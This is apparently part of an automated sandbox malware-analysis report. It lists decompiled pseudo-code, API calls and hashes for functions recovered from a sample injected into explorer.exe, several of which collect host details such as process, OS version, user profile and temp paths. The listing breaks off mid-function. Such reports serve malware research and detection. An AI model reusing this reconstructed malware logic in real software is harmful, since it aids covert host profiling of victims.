                  • Instruction Fuzzy Hash: EB3108B6900119AFEB11DF94CD88EEEBBBCFB08350F1142AAB551E7251D7309E018B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008A3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
                  				intOrPtr _v8;
                  				signed int _v16;
                  				char _v20;
                  				void* _t24;
                  				char _t25;
                  				signed int _t30;
                  				intOrPtr* _t45;
                  				signed int _t46;
                  				void* _t47;
                  				void* _t54;
                  
                  				_t54 = __fp0;
                  				_t45 = __edx;
                  				_t46 = 0;
                  				_t30 = __ecx;
                  				if( *__edx > 0) {
                  					do {
                  						_t24 = E00089ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
                  						if(_t24 == 0) {
                  							_t25 = E00089749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
                  							_v8 = _t25;
                  							if(_t25 != 0) {
                  								L6:
                  								_v16 = _v16 & 0x00000000;
                  								_v20 = _t25;
                  								E0008A0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
                  								_t47 = _t47 + 0xc;
                  							} else {
                  								if(GetLastError() != 0xd) {
                  									_t25 = _v8;
                  									goto L6;
                  								} else {
                  									E00089F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
                  								}
                  							}
                  						}
                  						_t46 = _t46 + 1;
                  					} while (_t46 <  *_t45);
                  				}
                  				return 0;
                  			}














                  APIs
                    • Part of subcall function 00089749: SetLastError.KERNEL32(0000000D,00000000,00000000,0008A341,00000000,00000000,?,?,?,00085AE1), ref: 00089782
                  • GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,00084C60,?,?,00000000), ref: 0008A424
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: ErrorLast
                  • String ID:
                  • API String ID: 1452528299-0
                  • Opcode ID: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
                  • Instruction ID: d50668ac3df27808708a7b6c1a3b0588ebee05c3692105c45d8eef2a65c833a9
                  • Opcode Fuzzy Hash: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
                  • Instruction Fuzzy Hash: 8B11A175B00106ABEB10FF68C485AAEF3A9FBD5714F20816AD44297742DBB0ED05CBD5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E00085D7D(void* __eflags) {
                  				char _v44;
                  				intOrPtr _t7;
                  				intOrPtr _t10;
                  				void* _t11;
                  				WCHAR* _t12;
                  				WCHAR* _t13;
                  				WCHAR* _t14;
                  				intOrPtr _t15;
                  				intOrPtr _t19;
                  				intOrPtr _t22;
                  				void* _t27;
                  				WCHAR* _t28;
                  
                  				_t7 =  *0x9e688; // 0xb0000
                  				E0008A86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
                  				_t10 =  *0x9e684; // 0xe7f8f0
                  				_t28 = 2;
                  				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
                  				if(_t11 == 0) {
                  					_t22 =  *0x9e688; // 0xb0000
                  					_t12 = E00085974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
                  					 *0x9e6ac = _t12;
                  					__eflags = _t12;
                  					if(_t12 != 0) {
                  						_t14 = E00089EBB();
                  						__eflags = _t14;
                  						if(_t14 == 0) {
                  							_t28 = 0;
                  							__eflags = 0;
                  						} else {
                  							_t15 =  *0x9e688; // 0xb0000
                  							lstrcmpiW(_t15 + 0x228, _t14);
                  							asm("sbb esi, esi");
                  							_t28 = _t28 + 1;
                  						}
                  					}
                  					_t13 = _t28;
                  				} else {
                  					_t19 =  *0x9e684; // 0xe7f8f0
                  					 *((intOrPtr*)(_t19 + 0x30))(_t11);
                  					_t13 = 3;
                  				}
                  				return _t13;
                  			}
















                  APIs
                  • lstrcmpiW.KERNEL32(000AFDD8,00000000), ref: 00085DF2
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: lstrcmpi
                  • String ID:
                  • API String ID: 1586166983-0
                  • Opcode ID: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                  • Instruction ID: 4fec7bbb8dec9b8e29c5d3869e1073f411c91b91cf4618315680d6859f46272f
                  • Opcode Fuzzy Hash: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                  • Instruction Fuzzy Hash: 0701D431300611DFF754FBA9DC49F9A33E8BB58381F094022F542EB2A2DA60DC00CBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008BA05() {
                  				signed int _v8;
                  				signed int _v12;
                  				intOrPtr _t15;
                  				void* _t16;
                  				void* _t18;
                  				void* _t21;
                  				intOrPtr _t22;
                  				void* _t24;
                  				void* _t30;
                  
                  				_v8 = _v8 & 0x00000000;
                  				_t15 =  *0x9e68c; // 0xe7fab8
                  				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
                  				if(_t16 != 0) {
                  					_v12 = _v12 & 0x00000000;
                  					_t18 = E0008B998(1,  &_v12); // executed
                  					_t30 = _t18;
                  					if(_t30 != 0) {
                  						CloseHandle(_v8);
                  						_t21 = _t30;
                  					} else {
                  						if(_v8 != _t18) {
                  							_t22 =  *0x9e684; // 0xe7f8f0
                  							 *((intOrPtr*)(_t22 + 0x30))(_v8);
                  						}
                  						_t21 = 0;
                  					}
                  					return _t21;
                  				} else {
                  					return _t16;
                  				}
                  			}













                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                  • Instruction ID: c4d0144dd0226c5aba2f7410e7a6f6ad075efd4050d4223f465ea27968045e4c
                  • Opcode Fuzzy Hash: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                  • Instruction Fuzzy Hash: 13F03732A10208EFEF64EBA4CD4AAAE77F8FB54399F1140A9F141E7151EB74DE009B51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00085CEC(void* __ecx, void* __eflags, void* __fp0) {
                  				void _v44;
                  				signed int _t8;
                  				intOrPtr _t14;
                  				intOrPtr _t15;
                  				intOrPtr _t21;
                  				void* _t24;
                  				void* _t29;
                  				void* _t35;
                  
                  				_t35 = __eflags;
                  				_t24 = __ecx;
                  				_t8 =  *0x9e688; // 0xb0000
                  				E0009249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
                  				E000885EF();
                  				E00088F78();
                  				 *0x9e780 = 0;
                  				 *0x9e784 = 0;
                  				 *0x9e77c = 0;
                  				E00085EB6(); // executed
                  				E0008CF84(_t24);
                  				_t14 =  *0x9e688; // 0xb0000
                  				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
                  				_t15 =  *0x9e688; // 0xb0000
                  				E0008A86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
                  				E0008B337( &_v44);
                  				memset( &_v44, 0, 0x27);
                  				E00085C26( &_v44, __fp0);
                  				_t21 =  *0x9e684; // 0xe7f8f0
                  				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
                  				return 0;
                  			}












                  APIs
                    • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                    • Part of subcall function 0008CF84: GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                    • Part of subcall function 0008CF84: GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                    • Part of subcall function 0008CF84: memset.MSVCRT ref: 0008CFE2
                    • Part of subcall function 0008CF84: GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                    • Part of subcall function 0008CF84: GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                    • Part of subcall function 0008B337: CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                  • memset.MSVCRT ref: 00085D5F
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
                  • String ID:
                  • API String ID: 4245722550-0
                  • Opcode ID: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                  • Instruction ID: 619f41ac1f5a27a22a19cca9ef8015db0493fccabd3b7c3a99182c1f6e1babcb
                  • Opcode Fuzzy Hash: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                  • Instruction Fuzzy Hash: 28011D71501254AFF600FBA8DC4ADD97BE4FF18750F850066F44497263DB745940CBA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008861A(int _a4, intOrPtr _a8) {
                  				int _t3;
                  				intOrPtr _t4;
                  				void* _t9;
                  
                  				_t3 = _a4;
                  				if(_t3 == 0) {
                  					return _t3;
                  				}
                  				_t9 =  *_t3;
                  				if(_t9 != 0) {
                  					 *_t3 =  *_t3 & 0x00000000;
                  					_t4 = _a8;
                  					if(_t4 != 0xffffffff) {
                  						if(_t4 == 0xfffffffe) {
                  							_t4 = E0008C392(_t9);
                  						}
                  					} else {
                  						_t4 = E0008C379(_t9);
                  					}
                  					E0008874F(_t9, 0, _t4);
                  					_t3 = HeapFree( *0x9e768, 0, _t9); // executed
                  				}
                  				return _t3;
                  			}







                  APIs
                  • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                  • Instruction ID: a28974b748b9f8cdd91a2a14d7a9ce437aea9645c05ed6ae8ab8bbe52d99dc9a
                  • Opcode Fuzzy Hash: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                  • Instruction Fuzzy Hash: A4F0E5315016246FEA607A24EC01FAE3798BF12B30FA4C211F854EB1D1EF31AD1187E9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008A77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                  				signed int _t5;
                  				void* _t6;
                  				void* _t10;
                  				long _t15;
                  				void* _t17;
                  
                  				_t15 = 2;
                  				_t5 = E0008A5F7(_a4, _t15);
                  				_t17 = _t5;
                  				if(_t17 != 0) {
                  					_t6 = E0008A65C(_t17, _a8, _a12); // executed
                  					if(_t6 != 0) {
                  						CloseHandle(_t17);
                  						return 0;
                  					}
                  					_t10 = 0xfffffffe;
                  					return _t10;
                  				}
                  				return _t5 | 0xffffffff;
                  			}









                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                  • Instruction ID: 663aae789e914c9616d0efe74e5f130c4bdd51193654dc020258e593981ed1c8
                  • Opcode Fuzzy Hash: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                  • Instruction Fuzzy Hash: 14E02236308A256BAB217A689C5099E37A4BF0A7707200213F9658BAC2DA30D84193D2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E000898A6(void* __eflags, intOrPtr _a4) {
                  				intOrPtr _t24;
                  
                  				_t24 = _a4;
                  				if(E0008A4BF( *(_t24 + 0x1c), 0x3a98) >= 0) {
                  					CloseHandle( *(_t24 + 0x1c));
                  					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
                  					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
                  						E0008984A(_t24, 1);
                  					}
                  					return  *((intOrPtr*)(_t24 + 0x18));
                  				}
                  				return 0;
                  			}





                  APIs
                  • CloseHandle.KERNELBASE(?), ref: 000898CA
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  • Opcode ID: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
                  • Instruction ID: b32fbe6ba74ab13a60de709608ce14b267378680ed387debe1417f5410f660e5
                  • Opcode Fuzzy Hash: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
                  • Instruction Fuzzy Hash: C0F0A031300702DBC720BF62E80496BBBE9FF563507048829E5C687962DB71F8019790
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E0008B337(void* __ecx) {
                  				intOrPtr _t4;
                  				void* _t5;
                  				intOrPtr _t6;
                  				void* _t12;
                  				void* _t13;
                  
                  				_t4 =  *0x9e684; // 0xe7f8f0
                  				_t13 = 0;
                  				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
                  				_t12 = _t5;
                  				if(_t12 != 0) {
                  					_t6 =  *0x9e684; // 0xe7f8f0
                  					_push(_t12);
                  					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
                  						_t13 = 1;
                  					}
                  					CloseHandle(_t12);
                  					return _t13;
                  				}
                  				return _t5;
                  			}









                  APIs
                  • CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  • Opcode ID: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                  • Instruction ID: 8fe01f62ba4c39ee7338d5a8f0e8a0c9642a3c10550f89b54f48b15bd4262c2d
                  • Opcode Fuzzy Hash: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                  • Instruction Fuzzy Hash: 15E04F33300120ABD6609B69EC4CF677BA9FBA6A91F060169F905C7111CB248C02C7A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  C-Code - Quality: 86%
                  			E0008D01F(void* __fp0) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				struct _SYSTEM_INFO _v52;
                  				char _v180;
                  				char _v692;
                  				char _v704;
                  				char _v2680;
                  				void* __esi;
                  				struct _OSVERSIONINFOA* _t81;
                  				intOrPtr _t83;
                  				void* _t84;
                  				long _t86;
                  				intOrPtr* _t88;
                  				intOrPtr _t90;
                  				intOrPtr _t95;
                  				intOrPtr _t97;
                  				void* _t98;
                  				intOrPtr _t103;
                  				char* _t105;
                  				void* _t108;
                  				char _t115;
                  				signed int _t117;
                  				char _t119;
                  				intOrPtr _t124;
                  				intOrPtr _t127;
                  				intOrPtr _t130;
                  				intOrPtr _t134;
                  				intOrPtr _t147;
                  				intOrPtr _t149;
                  				intOrPtr _t152;
                  				intOrPtr _t154;
                  				signed int _t159;
                  				struct HINSTANCE__* _t162;
                  				short* _t164;
                  				intOrPtr _t167;
                  				WCHAR* _t168;
                  				char* _t169;
                  				intOrPtr _t181;
                  				intOrPtr _t200;
                  				void* _t215;
                  				char _t218;
                  				void* _t219;
                  				char* _t220;
                  				struct _OSVERSIONINFOA* _t222;
                  				void* _t223;
                  				int* _t224;
                  				void* _t241;
                  
                  				_t241 = __fp0;
                  				_t162 =  *0x9e69c; // 0x10000000
                  				_t81 = E00088604(0x1ac4);
                  				_t222 = _t81;
                  				if(_t222 == 0) {
                  					return _t81;
                  				}
                  				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
                  				_t83 =  *0x9e684; // 0xe7f8f0
                  				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
                  				_t3 = _t222 + 0x648; // 0x648
                  				E00092301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
                  				_t5 = _t222 + 0x1644; // 0x1644
                  				_t216 = _t5;
                  				_t86 = GetModuleFileNameW(0, _t5, 0x105);
                  				_t227 = _t86;
                  				if(_t86 != 0) {
                  					 *((intOrPtr*)(_t222 + 0x1854)) = E00088FBE(_t216, _t227);
                  				}
                  				GetCurrentProcess();
                  				_t88 = E0008BA05();
                  				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
                  				_t178 =  *_t88;
                  				if(E0008BB8D( *_t88) == 0) {
                  					_t90 = E0008BA62(_t178, _t222);
                  					__eflags = _t90;
                  					_t181 = (0 | _t90 > 0x00000000) + 1;
                  					__eflags = _t181;
                  					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
                  				} else {
                  					 *((intOrPtr*)(_t222 + 0x214)) = 3;
                  				}
                  				_t12 = _t222 + 0x220; // 0x220
                  				 *((intOrPtr*)(_t222 + 0x218)) = E0008E3F1(_t12);
                  				 *((intOrPtr*)(_t222 + 0x21c)) = E0008E3B6(_t12);
                  				_push( &_v16);
                  				 *(_t222 + 0x224) = _t162;
                  				_push( &_v8);
                  				_v12 = 0x80;
                  				_push( &_v692);
                  				_v8 = 0x100;
                  				_push( &_v12);
                  				_t22 = _t222 + 0x114; // 0x114
                  				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
                  				_t95 =  *0x9e68c; // 0xe7fab8
                  				_push(0);
                  				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
                  					GetLastError();
                  				}
                  				_t97 =  *0x9e694; // 0xe7fa48
                  				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
                  				_t26 = _t222 + 0x228; // 0x228
                  				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
                  				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
                  				GetLastError();
                  				_t31 = _t222 + 0x228; // 0x228
                  				 *((intOrPtr*)(_t222 + 0x434)) = E00088FBE(_t31, _t98);
                  				_t34 = _t222 + 0x114; // 0x114
                  				_t103 = E0008B7A8(_t34,  &_v692);
                  				_t35 = _t222 + 0xb0; // 0xb0
                  				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
                  				_push(_t35);
                  				E0008B67D(_t103, _t35, _t98, _t241);
                  				_t37 = _t222 + 0xb0; // 0xb0
                  				_t105 = _t37;
                  				_t38 = _t222 + 0xd0; // 0xd0
                  				_t164 = _t38;
                  				if(_t105 != 0) {
                  					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
                  					if(_t159 > 0) {
                  						_t164[_t159] = 0;
                  					}
                  				}
                  				_t41 = _t222 + 0x438; // 0x438
                  				_t42 = _t222 + 0x228; // 0x228
                  				E00088FD8(_t42, _t41);
                  				_t43 = _t222 + 0xb0; // 0xb0
                  				_t108 = E0008D400(_t43, E0008C379(_t43), 0);
                  				_t44 = _t222 + 0x100c; // 0x100c
                  				E0008B88A(_t108, _t44, _t241);
                  				_t199 = GetCurrentProcess();
                  				 *((intOrPtr*)(_t222 + 0x101c)) = E0008BBDF(_t110);
                  				memset(_t222, 0, 0x9c);
                  				_t224 = _t223 + 0xc;
                  				_t222->dwOSVersionInfoSize = 0x9c;
                  				GetVersionExA(_t222);
                  				_t167 =  *0x9e684; // 0xe7f8f0
                  				_t115 = 0;
                  				_v8 = 0;
                  				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
                  					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
                  					_t115 = _v8;
                  				}
                  				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
                  				if(_t115 == 0) {
                  					GetSystemInfo( &_v52);
                  					_t117 = _v52.dwOemId & 0x0000ffff;
                  				} else {
                  					_t117 = 9;
                  				}
                  				_t54 = _t222 + 0x1020; // 0x1020
                  				_t168 = _t54;
                  				 *(_t222 + 0x9c) = _t117;
                  				GetWindowsDirectoryW(_t168, 0x104);
                  				_t119 = E000895E1(_t199, 0x10c);
                  				_t200 =  *0x9e684; // 0xe7f8f0
                  				_t218 = _t119;
                  				 *_t224 = 0x104;
                  				_push( &_v704);
                  				_push(_t218);
                  				_v8 = _t218;
                  				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
                  					_t154 =  *0x9e684; // 0xe7f8f0
                  					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
                  				}
                  				E000885D5( &_v8);
                  				_t124 =  *0x9e684; // 0xe7f8f0
                  				_t61 = _t222 + 0x1434; // 0x1434
                  				_t219 = _t61;
                  				 *_t224 = 0x209;
                  				_push(_t219);
                  				_push(L"USERPROFILE");
                  				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
                  					E00089640(_t219, 0x105, L"%s\\%s", _t168);
                  					_t152 =  *0x9e684; // 0xe7f8f0
                  					_t224 =  &(_t224[5]);
                  					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
                  				}
                  				_push(0x20a);
                  				_t64 = _t222 + 0x122a; // 0x122a
                  				_t169 = L"TEMP";
                  				_t127 =  *0x9e684; // 0xe7f8f0
                  				_push(_t169);
                  				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
                  					_t149 =  *0x9e684; // 0xe7f8f0
                  					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
                  				}
                  				_push(0x40);
                  				_t220 = L"SystemDrive";
                  				_push( &_v180);
                  				_t130 =  *0x9e684; // 0xe7f8f0
                  				_push(_t220);
                  				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
                  					_t147 =  *0x9e684; // 0xe7f8f0
                  					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
                  				}
                  				_v8 = 0x7f;
                  				_t72 = _t222 + 0x199c; // 0x199c
                  				_t134 =  *0x9e684; // 0xe7f8f0
                  				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
                  				_t75 = _t222 + 0x100c; // 0x100c
                  				E00092301(E0008D400(_t75, E0008C379(_t75), 0),  &_v2680);
                  				_t76 = _t222 + 0x1858; // 0x1858
                  				E000922D3( &_v2680, _t76, 0x20);
                  				_t79 = _t222 + 0x1878; // 0x1878
                  				E0008902D(1, _t79, 0x14, 0x1e,  &_v2680);
                  				 *((intOrPtr*)(_t222 + 0x1898)) = E0008CD33(_t79);
                  				return _t222;
                  			}


                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • GetCurrentProcessId.KERNEL32 ref: 0008D046
                  • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0008D082
                  • GetCurrentProcess.KERNEL32 ref: 0008D09F
                  • GetLastError.KERNEL32 ref: 0008D13E
                  • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0008D16C
                  • GetLastError.KERNEL32 ref: 0008D172
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0008D1C7
                  • GetCurrentProcess.KERNEL32 ref: 0008D20E
                  • memset.MSVCRT ref: 0008D229
                  • GetVersionExA.KERNEL32(00000000), ref: 0008D234
                  • GetCurrentProcess.KERNEL32(00000100), ref: 0008D24E
                  • GetSystemInfo.KERNEL32(?), ref: 0008D26A
                  • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0008D287
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
                  • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                  • API String ID: 3876402152-2706916422
                  • Opcode ID: 273bfb211393cd56114f3bb121cdd4e9463ea66aaa9619a572f9bb9e4cc855bf
                  • Instruction ID: 25e8395d91437c6831676a43eef48ae52fba165dceb8ee9639bfc079f816c02c
                  • Opcode Fuzzy Hash: 273bfb211393cd56114f3bb121cdd4e9463ea66aaa9619a572f9bb9e4cc855bf
                  • Instruction Fuzzy Hash: 77B16071600704AFE750EB70DD89FEA77E8BF58300F00456AF59AD7292EB74AA04CB21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 50%
                  			E0008DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				char _v24;
                  				void* _v28;
                  				signed int _v32;
                  				char _v36;
                  				intOrPtr _v40;
                  				signed int _v44;
                  				char _v48;
                  				char _v52;
                  				intOrPtr _v56;
                  				signed int _v60;
                  				char* _v72;
                  				signed short _v80;
                  				signed int _v84;
                  				char _v88;
                  				char _v92;
                  				char _v96;
                  				intOrPtr _v100;
                  				char _v104;
                  				char _v616;
                  				intOrPtr* _t159;
                  				char _t165;
                  				signed int _t166;
                  				signed int _t173;
                  				signed int _t178;
                  				signed int _t186;
                  				intOrPtr* _t187;
                  				signed int _t188;
                  				signed int _t192;
                  				intOrPtr* _t193;
                  				intOrPtr _t200;
                  				intOrPtr* _t205;
                  				signed int _t207;
                  				signed int _t209;
                  				intOrPtr* _t210;
                  				intOrPtr _t212;
                  				intOrPtr* _t213;
                  				signed int _t214;
                  				char _t217;
                  				signed int _t218;
                  				signed int _t219;
                  				signed int _t230;
                  				signed int _t235;
                  				signed int _t242;
                  				signed int _t243;
                  				signed int _t244;
                  				signed int _t245;
                  				intOrPtr* _t247;
                  				intOrPtr* _t251;
                  				signed int _t252;
                  				intOrPtr* _t253;
                  				void* _t255;
                  				intOrPtr* _t261;
                  				signed int _t262;
                  				signed int _t283;
                  				signed int _t289;
                  				char* _t298;
                  				void* _t320;
                  				signed int _t322;
                  				intOrPtr* _t323;
                  				intOrPtr _t324;
                  				signed int _t327;
                  				intOrPtr* _t328;
                  				intOrPtr* _t329;
                  
                  				_v32 = _v32 & 0x00000000;
                  				_v60 = _v60 & 0x00000000;
                  				_v56 = __edx;
                  				_v100 = __ecx;
                  				_t159 = E0008D523(__ecx);
                  				_t251 = _t159;
                  				_v104 = _t251;
                  				if(_t251 == 0) {
                  					return _t159;
                  				}
                  				_t320 = E00088604(0x10);
                  				_v36 = _t320;
                  				_pop(_t255);
                  				if(_t320 == 0) {
                  					L53:
                  					E0008861A( &_v60, 0xfffffffe);
                  					E0008D5D7( &_v104);
                  					return _t320;
                  				}
                  				_t165 = E000895E1(_t255, 0x536);
                  				 *_t328 = 0x609;
                  				_v52 = _t165;
                  				_t166 = E000895E1(_t255);
                  				_push(0);
                  				_push(_v56);
                  				_v20 = _t166;
                  				_push(_t166);
                  				_push(_a4);
                  				_t322 = E000892E5(_t165);
                  				_v60 = _t322;
                  				E000885D5( &_v52);
                  				E000885D5( &_v20);
                  				_t329 = _t328 + 0x20;
                  				if(_t322 != 0) {
                  					_t323 = __imp__#2;
                  					_v40 =  *_t323(_t322);
                  					_t173 = E000895E1(_t255, 0x9e4);
                  					_v20 = _t173;
                  					_v52 =  *_t323(_t173);
                  					E000885D5( &_v20);
                  					_t324 = _v40;
                  					_t261 =  *_t251;
                  					_t252 = 0;
                  					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                  					__eflags = _t178;
                  					if(_t178 != 0) {
                  						L52:
                  						__imp__#6(_t324);
                  						__imp__#6(_v52);
                  						goto L53;
                  					}
                  					_t262 = _v32;
                  					_v28 = 0;
                  					_v20 = 0;
                  					__eflags = _t262;
                  					if(_t262 == 0) {
                  						L49:
                  						 *((intOrPtr*)( *_t262 + 8))(_t262);
                  						__eflags = _t252;
